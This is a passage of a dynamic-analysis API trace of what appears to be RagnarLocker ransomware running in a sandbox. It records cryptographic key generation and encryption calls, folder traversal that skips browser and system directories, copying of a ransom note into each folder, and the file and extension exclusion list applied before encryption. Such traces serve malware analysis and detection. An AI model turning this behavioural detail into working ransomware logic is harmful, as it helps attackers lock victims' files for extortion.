szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x5d26eb0) returned 1 [0175.730] CryptGenRandom (in: hProv=0x5d26eb0, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0175.730] CryptReleaseContext (hProv=0x5d26eb0, dwFlags=0x0) returned 1 [0175.730] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0175.732] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x5d26fc0) returned 1 [0175.733] CryptGenRandom (in: hProv=0x5d26fc0, dwLen=0x20, pbBuffer=0x5d1cf9c | out: pbBuffer=0x5d1cf9c) returned 1 [0175.733] CryptReleaseContext (hProv=0x5d26fc0, dwFlags=0x0) returned 1 [0175.733] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0175.735] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x5d265a8) returned 1 [0175.735] CryptGenRandom (in: hProv=0x5d265a8, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0175.735] CryptReleaseContext (hProv=0x5d265a8, dwFlags=0x0) returned 1 [0175.735] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0175.746] CryptEncrypt (in: hKey=0x3547c80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0175.747] GetLastError () returned 0x80090016 [0175.747] CryptEncrypt (in: hKey=0x3547c80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0175.747] GetLastError () returned 0x80090016 [0175.747] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d10050, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0x13c0) returned 0x3b4 [0175.748] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x5d26af8) returned 1 [0175.748] CryptGenRandom (in: hProv=0x5d26af8, dwLen=0x28, pbBuffer=0x3613354 | out: pbBuffer=0x3613354) returned 1 [0175.749] CryptReleaseContext (hProv=0x5d26af8, dwFlags=0x0) returned 1 [0175.749] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0175.751] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x5d268d8) returned 1 [0175.751] CryptGenRandom (in: hProv=0x5d268d8, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0175.751] CryptReleaseContext (hProv=0x5d268d8, dwFlags=0x0) returned 1 [0175.751] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0175.753] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x5d26740) returned 1 [0175.754] CryptGenRandom (in: hProv=0x5d26740, dwLen=0x20, pbBuffer=0x361337c | out: pbBuffer=0x361337c) returned 1 [0175.754] CryptReleaseContext (hProv=0x5d26740, dwFlags=0x0) returned 1 [0175.754] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0175.756] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x5d26e28) returned 1 [0175.756] CryptGenRandom (in: hProv=0x5d26e28, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0175.756] CryptReleaseContext (hProv=0x5d26e28, dwFlags=0x0) returned 1 [0175.756] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0175.758] CryptEncrypt (in: hKey=0x3547c80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0175.758] GetLastError () returned 0x80090016 [0175.758] CryptEncrypt (in: hKey=0x3547c80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0175.759] GetLastError () returned 0x80090016 [0175.759] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x3606430, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0x13b8) returned 0x3f0 [0175.759] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5cfe0d0*=0x3b4, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0175.862] GetProcessHeap () returned 0x3520000 [0175.862] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3586900 | out: hHeap=0x3520000) returned 1 [0175.862] CloseHandle (hObject=0x3b4) returned 1 [0175.862] GetProcessHeap () returned 0x3520000 [0175.862] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d10050 | out: hHeap=0x3520000) returned 1 [0175.863] CloseHandle (hObject=0x3f0) returned 1 [0175.863] GetProcessHeap () returned 0x3520000 [0175.863] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3606430 | out: hHeap=0x3520000) returned 1 [0175.863] FindClose (in: hFindFile=0x3547fc0 | out: hFindFile=0x3547fc0) returned 1 [0175.864] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1049", cAlternateFileName="")) returned 1 [0175.865] lstrcmpiW (lpString1="1049", lpString2=".") returned 1 [0175.865] lstrcmpiW (lpString1="1049", lpString2="..") returned 1 [0175.865] lstrcmpiW (lpString1="1049", lpString2="Windows") returned -1 [0175.865] lstrcmpiW (lpString1="1049", lpString2="Windows.old") returned -1 [0175.865] lstrcmpiW (lpString1="1049", lpString2="Tor browser") returned -1 [0175.865] lstrcmpiW (lpString1="1049", lpString2="Internet Explorer") returned -1 [0175.865] lstrcmpiW (lpString1="1049", lpString2="Google") returned -1 [0175.865] lstrcmpiW (lpString1="1049", lpString2="Opera") returned -1 [0175.865] lstrcmpiW (lpString1="1049", lpString2="Opera Software") returned -1 [0175.865] lstrcmpiW (lpString1="1049", lpString2="Mozilla") returned -1 [0175.865] lstrcmpiW (lpString1="1049", lpString2="Mozilla Firefox") returned -1 [0175.865] lstrcmpiW (lpString1="1049", lpString2="$Recycle.Bin") returned 1 [0175.865] lstrcmpiW (lpString1="1049", lpString2="ProgramData") returned -1 [0175.865] lstrcmpiW (lpString1="1049", lpString2="All Users") returned -1 [0175.865] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0175.865] lstrcpyW (in: lpString1=0x5cfe9b8, lpString2="1049" | out: lpString1="1049") returned="1049" [0175.865] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1049", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1049\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1049\\" [0175.865] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1049\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1049\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1049\\" [0175.865] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1049\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1049\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\1049\\!$R4GN4R_B8CF767A$!.txt" [0175.865] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\1049\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0175.914] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1049\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1049\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\1049\\*.*" [0175.914] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1049\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.914] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0175.914] lstrcpyW (in: lpString1=0x5cfd8a2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0175.914] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547ac0 [0175.915] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0175.915] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf6315abd, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.916] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0175.916] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0175.916] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf62a318f, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf62a318f, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0175.916] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0175.916] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0175.916] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd4b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0175.916] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0175.916] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0175.916] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13e4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0175.916] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0175.916] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0175.916] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0175.916] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0175.916] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0175.916] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0175.916] FindClose (in: hFindFile=0x3547ac0 | out: hFindFile=0x3547ac0) returned 1 [0175.916] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547fc0 [0175.917] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf6315abd, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf6315abd, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.917] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf62a318f, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf62a318f, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0175.917] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1049\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.917] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0175.917] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1049\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0175.917] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0175.917] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd4b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0175.917] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1049\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.917] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="eula.rtf" | out: lpString1="eula.rtf") returned="eula.rtf" [0175.917] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf") returned=".rtf" [0175.917] lstrcmpiW (lpString1="eula.rtf", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0175.917] lstrcmpiW (lpString1="eula.rtf", lpString2="autorun.inf") returned 1 [0175.917] lstrcmpiW (lpString1="eula.rtf", lpString2="boot.ini") returned 1 [0175.917] lstrcmpiW (lpString1="eula.rtf", lpString2="bootfont.bin") returned 1 [0175.917] lstrcmpiW (lpString1="eula.rtf", lpString2="bootsect.bak") returned 1 [0175.917] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr") returned 1 [0175.917] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr.efi") returned 1 [0175.917] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgfw.efi") returned 1 [0175.917] lstrcmpiW (lpString1="eula.rtf", lpString2="desktop.ini") returned 1 [0175.917] lstrcmpiW (lpString1="eula.rtf", lpString2="iconcache.db") returned -1 [0175.917] lstrcmpiW (lpString1="eula.rtf", lpString2="ntldr") returned -1 [0175.917] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat") returned -1 [0175.917] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat.log") returned -1 [0175.917] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.ini") returned -1 [0175.917] lstrcmpiW (lpString1="eula.rtf", lpString2="thumbs.db") returned -1 [0175.917] lstrcmpiW (lpString1=".rtf", lpString2=".db") returned 1 [0175.917] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0175.917] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0175.917] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0175.917] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0175.917] lstrcmpiW (lpString1=".rtf", lpString2=".drv") returned 1 [0175.917] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0175.918] GetProcessHeap () returned 0x3520000 [0175.918] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x3606430 [0175.919] lstrcpyW (in: lpString1=0x3606830, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf" [0175.919] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13e4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0175.919] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1049\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.919] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="LocalizedData.xml" | out: lpString1="LocalizedData.xml") returned="LocalizedData.xml" [0175.919] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned=".xml" [0175.919] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0175.919] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="autorun.inf") returned 1 [0175.919] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="boot.ini") returned 1 [0175.919] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootfont.bin") returned 1 [0175.919] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootsect.bak") returned 1 [0175.919] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr") returned 1 [0175.919] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr.efi") returned 1 [0175.919] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgfw.efi") returned 1 [0175.919] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="desktop.ini") returned 1 [0175.920] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="iconcache.db") returned 1 [0175.920] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntldr") returned -1 [0175.920] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat") returned -1 [0175.920] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat.log") returned -1 [0175.920] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.ini") returned -1 [0175.920] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="thumbs.db") returned -1 [0175.920] lstrcmpiW (lpString1=".xml", lpString2=".db") returned 1 [0175.920] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0175.920] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0175.920] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0175.920] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0175.920] lstrcmpiW (lpString1=".xml", lpString2=".drv") returned 1 [0175.920] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0175.920] GetProcessHeap () returned 0x3520000 [0175.920] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d10050 [0175.921] lstrcpyW (in: lpString1=0x5d10450, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" [0175.921] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0175.921] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1049\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.921] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="SetupResources.dll" | out: lpString1="SetupResources.dll") returned="SetupResources.dll" [0175.921] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned=".dll" [0175.921] lstrcmpiW (lpString1="SetupResources.dll", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0175.921] lstrcmpiW (lpString1="SetupResources.dll", lpString2="autorun.inf") returned 1 [0175.921] lstrcmpiW (lpString1="SetupResources.dll", lpString2="boot.ini") returned 1 [0175.921] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootfont.bin") returned 1 [0175.921] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootsect.bak") returned 1 [0175.921] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr") returned 1 [0175.921] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr.efi") returned 1 [0175.921] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgfw.efi") returned 1 [0175.921] lstrcmpiW (lpString1="SetupResources.dll", lpString2="desktop.ini") returned 1 [0175.921] lstrcmpiW (lpString1="SetupResources.dll", lpString2="iconcache.db") returned 1 [0175.921] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntldr") returned 1 [0175.922] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat") returned 1 [0175.922] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat.log") returned 1 [0175.922] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.ini") returned 1 [0175.922] lstrcmpiW (lpString1="SetupResources.dll", lpString2="thumbs.db") returned -1 [0175.922] lstrcmpiW (lpString1=".dll", lpString2=".db") returned 1 [0175.922] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0175.922] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0175.922] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0175.922] GetProcessHeap () returned 0x3520000 [0175.922] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x3586900 [0175.922] CryptAcquireContextW (in: phProv=0x3586900, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 